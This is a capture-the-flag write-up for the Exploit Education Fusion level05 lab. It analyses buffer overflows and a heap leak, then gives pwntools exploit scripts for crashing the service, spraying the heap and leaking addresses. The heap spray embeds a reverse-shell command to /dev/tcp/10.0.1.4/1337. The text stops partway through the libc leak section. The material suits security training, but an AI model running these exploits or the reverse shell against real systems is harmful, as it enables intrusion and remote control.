Exploit Education | Fusion | Level 05 Solution

Even more information leaks and stack overwrites. This time with random libraries / evented programming styles :>

The description and source code can be found here:
http://exploit.education/fusion/level05/

Source Code Analysis

At a high level, this program allows you to connect to the service and register users into a “database” (it’s just a global array variable). It also lets you send the “database” to a remote host, check names to see if they’ve been registered, and see which registered user is “up” on a port that you specify.

childtask()

This function simply handles each of the program’s available commands:

if (strncmp(buffer, "addreg ", 7) == 0) {
    taskcreate(addreg, strdup(buffer + 7), STACK);
    continue;
}

if (strncmp(buffer, "senddb ", 7) == 0) {
    taskcreate(senddb, strdup(buffer + 7), STACK);
    continue;
}

if (strncmp(buffer, "checkname ", 10) == 0) {
    struct isuparg *isa = calloc(sizeof(struct isuparg), 1);
    isa->fd = cfd;
    isa->string = strdup(buffer + 10);
    taskcreate(checkname, isa, STACK);
    continue;
}

if (strncmp(buffer, "quit", 4) == 0) {
    break;
}

if (strncmp(buffer, "isup ", 5) == 0) {
    struct isuparg *isa = calloc(sizeof(struct isuparg), 1);
    isa->fd = cfd;
    isa->string = strdup(buffer + 5);
    taskcreate(isup, isa, STACK);
}

addreg()

This function lets you register users into a “database” by supplying the command, name, flags (as an integer), and IPv4 address.

static void addreg(void *arg) {
    char *name, *sflags, *ipv4, *p;
    int h, flags;
    char *line = (char *)(arg);

    name = line;
    p = strchr(line, ' ');
    if (! p) goto bail;
    *p++ = 0;
    sflags = p;
    p = strchr(p, ' ');
    if (! p) goto bail;
    *p++ = 0;
    ipv4 = p;

    flags = atoi(sflags);
    if (flags & ~0xe0) goto bail;

    h = hash(name, strlen(name), REGDB-1);
    registrations[h].flags = flags;
    registrations[h].ipv4 = inet_addr(ipv4);

    printf("registration added successfully\n");

bail:
    free(line);
}

The program performs a check on the “flag” integer you supply. It quits and nothing happens if you don’t supply one of the following values: 0, 32, 64, 96, 128, 160, 192, 224. There doesn’t seem to be any reason for this and the flag integer doesn’t seem to be used in any meaningful way.
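The mask check is easier to see by enumerating it. Here is a minimal Python sketch (the helper name allowed_flags is mine, not something from the level's source) that lists every value below 256 that survives the flags & ~0xe0 test:

```python
def allowed_flags(limit=256):
    """Return every value in [0, limit) that passes addreg()'s mask check."""
    # addreg() bails out when any bit outside 0xe0 (bits 5, 6 and 7) is set.
    return [flags for flags in range(limit) if (flags & ~0xe0) == 0]


print(allowed_flags())  # [0, 32, 64, 96, 128, 160, 192, 224]
```

Only the three high bits of the low byte may be set, which gives the eight values listed above.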

The name supplied is “hashed” with their own custom 7-bit hashing algorithm. That hash is then used as the index for where to save the flags and IPv4 address in the registrations[] array.

An example of using the addreg command:

andrew ~ $ nc fusion 20005
addreg Andrew 32 10.0.1.4

senddb()

This function has an overflow vulnerability that I will later realize isn’t necessary for exploiting this program. So feel free to skip this section entirely. However, I’ll leave it in for shits & giggles…

static void senddb(void *arg) {
    unsigned char buffer[512], *p;
    char *host, *l;
    char *line = (char *)(arg);
    int port;
    int fd;
    int i;
    int sz;

    p = buffer;
    sz = sizeof(buffer);
    host = line;
    l = strchr(line, ' ');
    if (! l) goto bail;
    *l++ = 0;
    port = atoi(l);
    if (port == 0) goto bail;

    printf("sending db\n");

    if ((fd = netdial(UDP, host, port)) < 0) goto bail;

    for (sz = 0, p = buffer, i = 0; i < REGDB; i++) {
        if (registrations[i].flags | registrations[i].ipv4) {
            memcpy(p, &registrations[i], sizeof(struct registrations));
            p += sizeof(struct registrations);
            sz += sizeof(struct registrations);
        }
    }
bail:
    fdwrite(fd, buffer, sz);
    close(fd);
    free(line);
}

The for loop will copy the data from each element of the registrations[] array into the buffer[512] array. The registrations[] array is capable of holding up to 128 elements of the registrations struct, which was defined globally earlier:

struct registrations {
    short int flags;
    in_addr_t ipv4;
} __attribute__((packed));

#define REGDB (128)
struct registrations registrations[REGDB];

Since the struct was given the packed attribute, it will only use as much space as needed, which happens to be 6 bytes: two bytes for the short int and four for the in_addr_t. A little math tells us that filling the registrations[] array takes 768 bytes (6 * 128). That’s 256 bytes more than the buffer[512] array can hold.
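The same arithmetic can be checked quickly in Python. This is only a sketch: struct's "<" prefix is used as a stand-in for the packed attribute (it disables padding), and the constant names are mine.

```python
import struct

REGDB = 128          # number of entries in registrations[]
BUFFER_SIZE = 512    # size of buffer[] in senddb()

# "<" disables padding, mirroring __attribute__((packed)):
# a 2-byte short followed by a 4-byte in_addr_t.
PACKED_ENTRY = struct.calcsize("<hI")

worst_case = PACKED_ENTRY * REGDB              # bytes copied if every slot is used
overflow = worst_case - BUFFER_SIZE            # bytes written past the buffer
entries_that_fit = BUFFER_SIZE // PACKED_ENTRY # whole entries that fit safely

print(PACKED_ENTRY, worst_case, overflow, entries_that_fit)  # 6 768 256 85
```

So the 86th populated slot is the first one that spills past the end of the buffer.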

I wrote a short script as a proof of concept:

#!/usr/bin/env python3

from pwn import *
import time
import string
import random

def random_string(size):
    return ''.join(random.choice(string.ascii_letters) for x in range(size))

io = remote("fusion", 20005)
local_ip = "10.0.1.4"
local_port = 4444

log.info("Sending 'addreg' commands")
for i in range(170):
    io.sendline(f"addreg {random_string(32)} 32 17.17.17.17".encode())
    time.sleep(0.1)

log.info("Sending 'senddb' command")
senddb = f"senddb {local_ip} {local_port}\n".encode()
io.send(senddb)
io.close()

Running this script from the attacking VM takes about 20 seconds because of the 0.1 second sleep between each command. Without the sleep, I noticed that several commands would get bunched into a single packet and the buffer wasn’t being overflowed.

andrew ~/level05 $ ./bof.py 
[+] Opening connection to fusion on port 20005: Done
[*] Sending 'addreg' commands
[*] Sending 'senddb' command
[*] Closed connection to fusion port 20005

On the Fusion VM, we can see the segfault in the kernel messages:

fusion@fusion:~$ dmesg
...
[ 2446.051965] level05[1878]: segfault at 20110d ip b764d90e sp b8ff695c error 4 in libc-2.13.so[b75db000+176000]

Hash

I need a list of strings I can use for the “name” field, along with their hashed values. To place data at specific positions in the overflowed buffer, I need to know which index in the registrations[] array each name maps to. I rewrote the hashing algorithm in a Python script and created a loop to hash a bunch of 2-character strings and print the results.

#!/usr/bin/env python3

import string


def hash(name):
    """Python port of the level's hash(); returns an index from 0 to 127."""
    mask = 127
    h = 0xfee13117
    max_int = 0xffffffff

    for ch in name:
        h ^= ord(ch)
        h += (h << 11)
        h &= max_int
        h ^= (h >> 7)
        h -= ord(ch)
        h &= max_int  # emulate unsigned 32-bit wraparound

    h += (h << 3)
    h &= max_int
    h ^= (h >> 10)
    h += (h << 15)
    h &= max_int
    h -= (h >> 17)

    return (h & mask)


if __name__ == "__main__":
    all_chars = string.ascii_letters + string.digits #+ string.punctuation
    for first in all_chars:
        for second in all_chars:
            name = first + second
            h = hash(name)
            print(f"{h}\t{name}")
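Printing every pair gives a long list to scroll through. A small variation that I find handier is to build a lookup table from index to name, so you can ask for "a name that lands in slot N". This is a sketch: level05_hash is my own port of the same algorithm as the script above, and names_by_index is a made-up helper.

```python
import string


def level05_hash(name, mask=0x7f):
    """Port of the level's hash(), emulating 32-bit unsigned arithmetic."""
    h = 0xfee13117
    for ch in name.encode():
        h ^= ch
        h = (h + (h << 11)) & 0xffffffff
        h ^= h >> 7
        h = (h - ch) & 0xffffffff
    h = (h + (h << 3)) & 0xffffffff
    h ^= h >> 10
    h = (h + (h << 15)) & 0xffffffff
    h = (h - (h >> 17)) & 0xffffffff
    return h & mask


def names_by_index(alphabet=string.ascii_letters + string.digits):
    """Map each reachable index to the first two-character name hashing to it."""
    table = {}
    for first in alphabet:
        for second in alphabet:
            name = first + second
            table.setdefault(level05_hash(name), name)
    return table


table = names_by_index()
print(f"{len(table)} of 128 slots reachable with two-character names")
```

Looking up table[i] then gives a name to pass to addreg for slot i, assuming that slot is reachable with this alphabet.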

checkname()

There exists another buffer overflow in the get_and_hash() function, which is called by checkname().

int get_and_hash(int maxsz, char *string, char separator) {
    char name[32];
    int i;

    if (maxsz > 32) return 0;
    for (i = 0; i < maxsz, string[i]; i++) {
        if (string[i] == separator) break;
        name[i] = string[i];
    }

    return hash(name, strlen(name), 0x7f);
}

struct isuparg {
    int fd;
    char *string;
};

static void checkname(void *arg) {
    struct isuparg *isa = (struct isuparg *)(arg);
    int h;

    h = get_and_hash(32, isa->string, '@');
    fdprintf(isa->fd, "%s is %sindexed already\n", isa->string, registrations[h].ipv4 ? "" : "not ");
}

The checkname() function takes the string the user supplied after the “checkname ” command and sends it to the get_and_hash() function. It looks like the intention is to loop through each character of that string, save it to the name[32] variable, and stop when either the supplied string ends or it reaches the maximum size of 32.

Except, that’s not how this works. Admittedly, it took me a long time to spot this myself as I’m not a C developer. The loop condition joins i < maxsz and string[i] with the comma operator instead of &&. The comma operator evaluates both expressions but yields only the value of the last one, so the result of i < maxsz is thrown away and the loop keeps going for as long as string[i] is non-zero (or until it hits the separator character).
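To convince myself of the difference, here is a small Python simulation of the copy loop. It is only a model of the C code, not the real thing: bytes_copied is a hypothetical helper that counts how many bytes would be written into name[32] under the buggy condition versus the one the author presumably intended.

```python
def bytes_copied(data, maxsz=32, separator=ord("@"), buggy=True):
    """Count how many bytes the get_and_hash() loop would write into name[]."""
    i = 0
    while True:
        in_bounds = i < maxsz
        more_input = i < len(data) and data[i] != 0  # string[i] != '\0'
        # Buggy form:  (i < maxsz, string[i])    -> only string[i] decides.
        # Intended:    (i < maxsz && string[i])  -> both must hold.
        keep_going = more_input if buggy else (in_bounds and more_input)
        if not keep_going or data[i] == separator:
            break
        i += 1
    return i


print(bytes_copied(b"A" * 50))               # 50: writes 18 bytes past name[32]
print(bytes_copied(b"A" * 50, buggy=False))  # 32: what the bound was meant to do
```

The separator still ends the copy early in both versions, which is why '@' cannot appear inside a payload.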

We can test this out by sending the “checkname” command followed by a string that we know will overflow the buffer and overwrite the saved EIP pointer.

andrew ~/level05 $ python3 -c 'print("checkname " + "A"*50)' | nc fusion 20005
** welcome to level05 **

The dmesg command on the Fusion VM will show that we have full control over the EIP register.

fusion@fusion ~ $ dmesg 
[10664.771069] level05[3230]: segfault at 41414141 ip 41414141 sp b929ebb0 error 14

This alone will not do much for us, as everything is randomized. Even the addresses of the program’s own code are randomized, because it’s a Position Independent Executable. But we’ll see later how this can be used.

Note that the get_and_hash() function does NOT null-terminate the name[] string. Because data is already on the stack, the name passed to the hash() function is rarely the same as what the user submitted. So usually, you’ll get the message that “ is not indexed already” even if it IS indexed already.

isup()

The “isup” command takes 2 arguments (for some reason): almost anything is accepted for the first, and the second must be a valid port number. It simply goes through all the registered “names” in its database and attempts to connect to each of them via UDP on the port that was specified. If the host is listening on the specified port, then the server sends it part of its registration info.

static void isup(void *arg) {
    unsigned char buffer[512], *p;
    char *host, *l;
    struct isuparg *isa = (struct isuparg *)(arg);
    int port;
    int fd;
    int i;
    int sz;

    // skip over first arg, get port
    l = strchr(isa->string, ' ');
    if (! l) return;
    *l++ = 0;

    port = atoi(l);
    host = malloc(64);

    for (i = 0; i < 128; i++) {
        p = (unsigned char *)(& registrations[i]);
        if (! registrations[i].ipv4) continue;

        sprintf(host, "%d.%d.%d.%d",
            (registrations[i].ipv4 >> 0) & 0xff,
            (registrations[i].ipv4 >> 8) & 0xff,
            (registrations[i].ipv4 >> 16) & 0xff,
            (registrations[i].ipv4 >> 24) & 0xff);

        if ((fd = netdial(UDP, host, port)) < 0) {
            continue;
        }

        buffer[0] = 0xc0;
        memcpy(buffer + 1, p, sizeof(struct registrations));
        buffer[5] = buffer[6] = buffer[7] = 0;

        fdwrite(fd, buffer, 8);
        close(fd);
    }

    free(host);
}
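To see exactly which part of the registration ends up on the wire, here is a short Python reconstruction of the 8-byte datagram. It is a sketch under two assumptions: the target is little-endian x86 (so the short is stored low byte first), and the address is stored in network byte order, as inet_addr() returns it. The function name isup_packet is mine.

```python
import socket
import struct


def isup_packet(flags, ip):
    """Rebuild the 8-byte datagram isup() sends for one registration."""
    # Packed struct in memory: 2-byte flags, then the 4 address bytes.
    entry = struct.pack("<h", flags) + socket.inet_aton(ip)

    packet = bytearray(8)
    packet[0] = 0xc0
    packet[1:7] = entry                    # memcpy(buffer + 1, p, 6)
    packet[5] = packet[6] = packet[7] = 0  # wipes the last two address bytes
    return bytes(packet)


print(isup_packet(32, "10.0.1.4").hex())  # c020000a00000000
```

Only the flags and the first two octets of the address survive, which matches the "part of its registration info" behaviour described above.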

Something important to note is that before the call to isup() (take a look back at the childtask() function), the buffer variable that contains the user-supplied data is put through strdup(), which allocates space for a copy of it on the heap. However, the pointer that strdup() returns never gets freed.

Exploitation

Heap Spraying

Because the strings allocated by the “isup” command are never freed, we can fill the heap with our own data. We will then overwrite the saved pointer that checkname() dereferences to read isa->fd and try to get it to point somewhere into the heap (more on that later). Our data needs to include a string that can get us a reverse shell, to pass as an argument to system(), as well as the value of the file descriptor, which happens to always be 0x4. A valid file descriptor is what allows the program to send data back to us. Since the descriptor fills a 32-bit integer, it contains null bytes, which means it has to go at the end of our data.

We’ll need to get an idea of where the heap base address may be and where it could possibly end. The more data we fill the heap with, the better our chances of finding a valid address later. However, we don’t need to fill it up completely, so we’ll try to be smart about it.

Some of the processes had heap space starting with 0x0 instead of 0xb. Our “level05” process (and all the other levels) always starts with 0xb:

root ~ # cat /proc/$(pidof level05)/maps 
b7648000-b768a000 rw-p 00000000 00:00 0 
b768a000-b7800000 r-xp 00000000 07:00 92669      /lib/i386-linux-gnu/libc-2.13.so
b7800000-b7802000 r--p 00176000 07:00 92669      /lib/i386-linux-gnu/libc-2.13.so
b7802000-b7803000 rw-p 00178000 07:00 92669      /lib/i386-linux-gnu/libc-2.13.so
b7803000-b7806000 rw-p 00000000 00:00 0 
b7810000-b7812000 rw-p 00000000 00:00 0 
b7812000-b7813000 r-xp 00000000 00:00 0          [vdso]
b7813000-b7831000 r-xp 00000000 07:00 92553      /lib/i386-linux-gnu/ld-2.13.so
b7831000-b7832000 r--p 0001d000 07:00 92553      /lib/i386-linux-gnu/ld-2.13.so
b7832000-b7833000 rw-p 0001e000 07:00 92553      /lib/i386-linux-gnu/ld-2.13.so
b7833000-b7839000 r-xp 00000000 07:00 75280      /opt/fusion/bin/level05
b7839000-b783a000 rw-p 00006000 07:00 75280      /opt/fusion/bin/level05
b783a000-b783d000 rw-p 00000000 00:00 0 
b9270000-b9291000 rw-p 00000000 00:00 0          [heap]
bfb7d000-bfb9e000 rw-p 00000000 00:00 0          [stack]

Let’s look at the heap space addresses for the various processes on the Fusion VM:

root ~ # cat /proc/*/maps | grep heap | grep ^b | sort
b7815000-b7836000 rw-p 00000000 00:00 0          [heap]
b7b7c000-b7b9d000 rw-p 00000000 00:00 0          [heap]
b7d46000-b7d67000 rw-p 00000000 00:00 0          [heap]
b7d46000-b7d67000 rw-p 00000000 00:00 0          [heap]
b7d46000-b7d67000 rw-p 00000000 00:00 0          [heap]
b7d67000-b7d88000 rw-p 00000000 00:00 0          [heap]
b7d67000-b7d88000 rw-p 00000000 00:00 0          [heap]
b7d67000-b7da7000 rw-p 00000000 00:00 0          [heap]
b7e4c000-b7e6d000 rw-p 00000000 00:00 0          [heap]
b7e90000-b7ed7000 rw-p 00000000 00:00 0          [heap]
b82b7000-b82d8000 rw-p 00000000 00:00 0          [heap]
b8336000-b8357000 rw-p 00000000 00:00 0          [heap]
b837f000-b83a0000 rw-p 00000000 00:00 0          [heap]
b8ae1000-b8b44000 rw-p 00000000 00:00 0          [heap]
b8e0b000-b8e46000 rw-p 00000000 00:00 0          [heap]
b8e0b000-b8e46000 rw-p 00000000 00:00 0          [heap]
b8e32000-b8e53000 rw-p 00000000 00:00 0          [heap]
b9270000-b9291000 rw-p 00000000 00:00 0          [heap]
b9647000-b9668000 rw-p 00000000 00:00 0          [heap]

We can see that it generally ranges between 0xb7815000 and 0xb9668000 (lowest address to highest address), the difference of which is 0x1e53000. That’s 31,797,248 in decimal. The childtask() function stores each command into a buffer with a maximum size of 512 bytes. In addition, you’ll see later that another 16 bytes of heap space are taken up to store the file descriptor each time. This means we’d need to send the “isup” command (the one we’re using for heap spraying) 60,222 times (31,797,248 ÷ (512 + 16)). Let’s take a look at what the heap looks like when we send data. First, I’ll attach to the “level05” process from the Fusion VM using gdbserver:

root ~ # gdbserver --attach :1234 $(pidof level05)
Attached; pid = 4819
Listening on port 1234

Then I’ll connect to it from GDB on my attacking VM (note that I copied the level05 binary to my attacking machine so that I could have GDB read the symbols):

andrew ~/level05 $ gdb
GEF for linux ready, type `gef' to start, `gef config' to configure
92 commands loaded for GDB 9.2 using Python engine 3.8

gef➤  file level05
Reading symbols from level05...

gef➤  target remote 10.0.1.5:1234
Remote debugging using 10.0.1.5:1234
...

gef➤  c
Continuing.

Now I’ll send some data:

andrew ~/level05 $ echo "isup $(pwn cyclic 512)" | nc fusion 20005
** welcome to level05 **

And check the heap:

^C
Program received signal SIGINT, Interrupt.
...
gef➤  heap chunks
Chunk(addr=0xb91fd008, size=0x108, flags=PREV_INUSE)
    [0xb91fd008     08 b0 5c b7 10 d1 1f b9 b0 54 20 b9 60 da 20 b9    ..\......T .`. .]
Chunk(addr=0xb91fd110, size=0x83a0, flags=PREV_INUSE)
    [0xb91fd110     66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00    fdtask..........]
Chunk(addr=0xb92054b0, size=0x83a0, flags=PREV_INUSE)
    [0xb92054b0     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................]
Chunk(addr=0xb920d850, size=0x10, flags=PREV_INUSE)
    [0xb920d850     04 00 00 00 60 d8 20 b9 00 00 00 00 01 02 00 00    ....`. .........]
Chunk(addr=0xb920d860, size=0x200, flags=PREV_INUSE)
    [0xb920d860     61 61 61 61 62 61 61 61 63 61 61 61 64 61 61 61    aaaabaaacaaadaaa]
Chunk(addr=0xb920da60, size=0x105a8, flags=PREV_INUSE)  ←  top chunk

gef➤  x/128wx 0xb920d860
0xb920d860:	0x61616161	0x61616162	0x61616163	0x61616164
0xb920d870:	0x61616165	0x61616166	0x61616167	0x61616168
0xb920d880:	0x61616169	0x6161616a	0x6161616b	0x6161616c
0xb920d890:	0x6161616d	0x6161616e	0x6161616f	0x61616170
0xb920d8a0:	0x61616171	0x61616172	0x61616173	0x61616174
0xb920d8b0:	0x61616175	0x61616176	0x61616177	0x61616178
0xb920d8c0:	0x61616179	0x6261617a	0x62616162	0x62616163
0xb920d8d0:	0x62616164	0x62616165	0x62616166	0x62616167
0xb920d8e0:	0x62616168	0x62616169	0x6261616a	0x6261616b
0xb920d8f0:	0x6261616c	0x6261616d	0x6261616e	0x6261616f
0xb920d900:	0x62616170	0x62616171	0x62616172	0x62616173
0xb920d910:	0x62616174	0x62616175	0x62616176	0x62616177
0xb920d920:	0x62616178	0x62616179	0x6361617a	0x63616162
0xb920d930:	0x63616163	0x63616164	0x63616165	0x63616166
0xb920d940:	0x63616167	0x63616168	0x63616169	0x6361616a
0xb920d950:	0x6361616b	0x6361616c	0x6361616d	0x6361616e
0xb920d960:	0x6361616f	0x63616170	0x63616171	0x63616172
0xb920d970:	0x63616173	0x63616174	0x63616175	0x63616176
0xb920d980:	0x63616177	0x63616178	0x63616179	0x6461617a
0xb920d990:	0x64616162	0x64616163	0x64616164	0x64616165
0xb920d9a0:	0x64616166	0x64616167	0x64616168	0x64616169
0xb920d9b0:	0x6461616a	0x6461616b	0x6461616c	0x6461616d
0xb920d9c0:	0x6461616e	0x6461616f	0x64616170	0x64616171
0xb920d9d0:	0x64616172	0x64616173	0x64616174	0x64616175
0xb920d9e0:	0x64616176	0x64616177	0x64616178	0x64616179
0xb920d9f0:	0x6561617a	0x65616162	0x65616163	0x65616164
0xb920da00:	0x65616165	0x65616166	0x65616167	0x65616168
0xb920da10:	0x65616169	0x6561616a	0x6561616b	0x6561616c
0xb920da20:	0x6561616d	0x6561616e	0x6561616f	0x65616170
0xb920da30:	0x65616171	0x65616172	0x65616173	0x65616174
0xb920da40:	0x65616175	0x65616176	0x65616177	0x65616178
0xb920da50:	0x65616179	0x6661617a	0x00616162	0x000105a9

The last complete word of the pattern here is 0x6661617a (the word after it, 0x00616162, already contains the terminating null byte). We’ll find the offset of that word and add our 0x4 value afterward in the heap spray script:

andrew ~/level05 $ pwn cyclic -l 0x6661617a
500

That means we can put 504 characters of padding (the 500 number does not include the 4 characters of the last full word value) in the buffer before our file descriptor value. Here’s a script I came up with for spraying the heap:

#!/usr/bin/env python3

from pwn import *
from time import sleep


buff_sz = 504
command  = b"isup "
content  = b"ABC "
content += b"/bin/sh > /dev/tcp/10.0.1.4/1337 0>&1 2>&1; " # 44 bytes
content += b"A" * (buff_sz - len(content))
content += pack(4)

io = remote("fusion", 20005)
log.info(io.recvline())

max_spray = 60222
with log.progress('Spraying') as p:
    for i in range(max_spray):
        io.send(command + content)
        p.status(f"{(i/max_spray):.2%}")
        sleep(0.005)

A couple of notes:

  • The “content” variable starts with “ABC ” because the first space in our content will get turned into a null byte. We can’t have that happen in the middle of our reverse shell string. Also I needed a unique value, like “ABC”, later on when I’m checking the returned data.
  • I need to add that small sleep value because without it, some of the requests get lumped together into a single packet. If that happens, only the first request is valid and the rest are ignored.
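The two magic numbers in the script (504 bytes of padding and 60,222 iterations) come straight from the measurements earlier in this section. A quick sanity check in Python, using only values already shown above (the constant names are mine):

```python
HEAP_LOW = 0xb7815000    # lowest heap start seen in /proc/*/maps
HEAP_HIGH = 0xb9668000   # highest heap end seen in /proc/*/maps
STRING_CHUNK = 512       # heap bytes used per strdup()'d command
ISUPARG_CHUNK = 16       # heap bytes used per struct isuparg

span = HEAP_HIGH - HEAP_LOW
per_request = STRING_CHUNK + ISUPARG_CHUNK
max_spray = span // per_request

# 500 is the cyclic offset of the last intact word; that word is 4 bytes long,
# so the fd value starts 504 bytes into the string.
fd_offset = 500 + 4

print(hex(span), span, per_request, max_spray, fd_offset)
# 0x1e53000 31797248 528 60222 504
```

This is a worst-case figure that covers the whole observed range; in practice the spray only has to reach the address we start guessing from.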

Running the script takes about 8 minutes:

andrew ~/level05 $ time ./3_spray.py 
[+] Opening connection to fusion on port 20005: Done
[*] ** welcome to level05 **
[+] Spraying: Done
 
real    8m17.777s
user    0m21.451s
sys     1m28.634s

Leaking the File Descriptor

Now that we’ve got the heap filled with data, we can look at the addresses there and try to find a pattern to make our address guessing a bit smarter:

gef➤  heap chunks 
Chunk(addr=0xb8759008, size=0x108, flags=PREV_INUSE)
    [0xb8759008     08 b0 60 b7 10 91 75 b8 b0 14 76 b8 70 9c 76 b8    ..`...u...v.p.v.]
Chunk(addr=0xb8759110, size=0x83a0, flags=PREV_INUSE)
    [0xb8759110     66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00    fdtask..........]
Chunk(addr=0xb87614b0, size=0x83a0, flags=PREV_INUSE)
    [0xb87614b0     30 64 7c b7 30 64 7c b7 00 00 00 00 00 00 00 00    0d|.0d|.........]
Chunk(addr=0xb8769850, size=0x10, flags=)
    [0xb8769850     04 00 00 00 60 98 76 b8 00 00 00 00 01 02 00 00    ....`.v.........]
Chunk(addr=0xb8769860, size=0x200, flags=PREV_INUSE)
    [0xb8769860     41 41 41 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64    AAA./bin/sh > /d]
Chunk(addr=0xb8769a60, size=0x10, flags=PREV_INUSE)
    [0xb8769a60     04 00 00 00 70 9a 76 b8 00 00 00 00 01 02 00 00    ....p.v.........]
Chunk(addr=0xb8769a70, size=0x200, flags=PREV_INUSE)
    [0xb8769a70     41 41 41 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64    AAA./bin/sh > /d]
...

We can see that the address of each chunk is 16-byte aligned and ends with 0.
Let’s look at the contents of a single chunk:

gef➤  x/128wx 0xb8769860
0xb8769860:	0x00414141	0x6e69622f	0x2068732f	0x642f203e
0xb8769870:	0x742f7665	0x312f7063	0x2e302e30	0x2f342e31
0xb8769880:	0x37333331	0x263e3020	0x3e322031	0x203b3126
0xb8769890:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87698a0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87698b0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87698c0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87698d0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87698e0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87698f0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769900:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769910:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769920:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769930:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769940:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769950:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769960:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769970:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769980:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769990:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87699a0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87699b0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87699c0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87699d0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87699e0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb87699f0:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769a00:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769a10:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769a20:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769a30:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769a40:	0x41414141	0x41414141	0x41414141	0x41414141
0xb8769a50:	0x41414141	0x41414141	0x00000004	0x00000011

The file descriptor that we included at the end (0x00000004) will always have an address ending with 8.

Let’s look at the tail end of the disassembly (from Ghidra) for the get_and_hash() function:

000127ab     ADD      ESP, 0x2c
000127ae     POP      ESI
000127af     POP      EDI
000127b0     POP      EBP
000127b1     RET

The stack includes 44 bytes (0x2c) of space, followed by saved values for the ESI, EDI, EBP, and EIP registers. Once execution is returned to the checkname() function, a few things happen but we’ll see what happens to the value in the ESI register before fdprintf() is called:

0001282b     MOV      EAX, dword ptr [ESI]
0001282d     MOV      dword ptr [ESP], EAX
00012830     CALL     fdprintf

The value that ESI points to is loaded into EAX and then stored at the top of the stack as the first argument to fdprintf(). This tells us that ESI holds the pointer to the file descriptor (the isa struct, whose first field is fd).
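Putting the epilogue and the overflow together gives the payload layout. The sketch below assumes that name[32] sits directly below the saved registers, so bytes 32 to 35 of the name land on saved ESI, the next four on saved EDI, then EBP, then the return address. That assumption is consistent with the 50-byte crash test earlier, but it is inferred rather than read off the disassembly. checkname_payload is a hypothetical helper and uses struct instead of pwntools to stay self-contained.

```python
import struct


def checkname_payload(esi, edi=None):
    """Build a checkname line that overwrites saved ESI (and optionally EDI)."""
    payload = b"checkname " + b"A" * 32      # fills name[32]
    payload += struct.pack("<I", esi)        # lands on saved ESI
    if edi is not None:
        payload += struct.pack("<I", edi)    # lands on saved EDI
    return payload


print(checkname_payload(0xb9700108))
```

Stopping after ESI (or EDI) leaves the saved EBP and return address intact, so the function returns normally and the service keeps running.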

Now, I’ll write a script to find a valid file descriptor address in our heap space.

#!/usr/bin/env python3

from pwn import *
import sys

start_addr = 0xb9700108
content  = b"checkname "
content += b"A" * 32

io = remote("fusion", 20005)
log.info(io.recvline())
log.info("Sending 'checkname' commands")

for addr in range(start_addr, start_addr+528, 16):
    io.sendline(content + p32(addr))
    data = io.recvline(timeout=0.1)

    if b"indexed already" in data:
        log.success(f"File descriptor address = {addr:#010x}")
        log.info(f"Reverse shell string should be at {addr+28:#010x}")
        sys.exit()

log.warning("File descriptor address not found!")

Choosing the address to start guessing with (the start_addr variable) can be tricky. If it’s outside the heap and it’s an invalid address, the program will crash and we’ll need to start over again by spraying the heap. I chose that starting address (0xb9700108) because I looked at all the heap starting addresses for the other processes on the system and didn’t see any that start above it, so it should be safe. I also know that, with the amount of data we’re spraying the heap with, it’s not high enough to land above the allocated heap space. And I know that the file descriptor address will always end with 8.

You can see that the for loop will only run through 33 times (528 ÷ 16). That should be the maximum number of guesses needed to find the file descriptor.

andrew ~/level05 $ ./leak_fd.py 
[+] Opening connection to fusion on port 20005: Done
[*] ** welcome to level05 **
[*] Sending 'checkname' commands
[+] File descriptor address = 0xb9700208
[*] Reverse shell string should be at 0xb9700224
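Why 33 guesses are always enough: the sprayed fd values repeat every 528 bytes (0x210) and always sit at an address ending in 8, so stepping 16 bytes at a time across one 528-byte window must hit exactly one of them. The sketch below checks that claim by brute force. The addresses are only examples taken from different runs above, and guesses_needed is a made-up helper.

```python
STRIDE = 0x210      # 16-byte isuparg chunk + 512-byte string chunk per request
SHELL_OFFSET = 28   # from a sprayed fd value to the "/bin/sh ..." string after it


def guesses_needed(start_addr, some_fd_addr, stride=STRIDE):
    """Return how many 16-byte steps from start_addr reach a sprayed fd value."""
    window = range(start_addr, start_addr + stride, 16)
    for guess, addr in enumerate(window, start=1):
        if (addr - some_fd_addr) % stride == 0:
            return guess
    return None


# Try 33 different starting phases against the fd address from the heap dump.
results = [guesses_needed(0xb9700108 + 16 * k, 0xb8769a58) for k in range(33)]
print(min(results), max(results))             # 1 33
print(hex(0xb9700208 + SHELL_OFFSET))         # 0xb9700224
```

The 28-byte offset is the 4-byte fd value, the next chunk's 4-byte size field, the 16-byte isuparg chunk, and the 4 bytes of "ABC\0" that precede the shell string.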

Leaking a Libc Address

The goal here is to call the system() function from libc and pass it a pointer to our reverse shell string. To get a libc function’s address, we would normally leak it from the .got.plt section, which is where the program records the resolved addresses of functions in libc (and other shared libraries). However, the system() function is never called in this binary, so it has no entry in the .got.plt section. We’ll need to leak another function’s address and calculate the offset from that to system(). In this case, I’ll be leaking the write() function’s address.

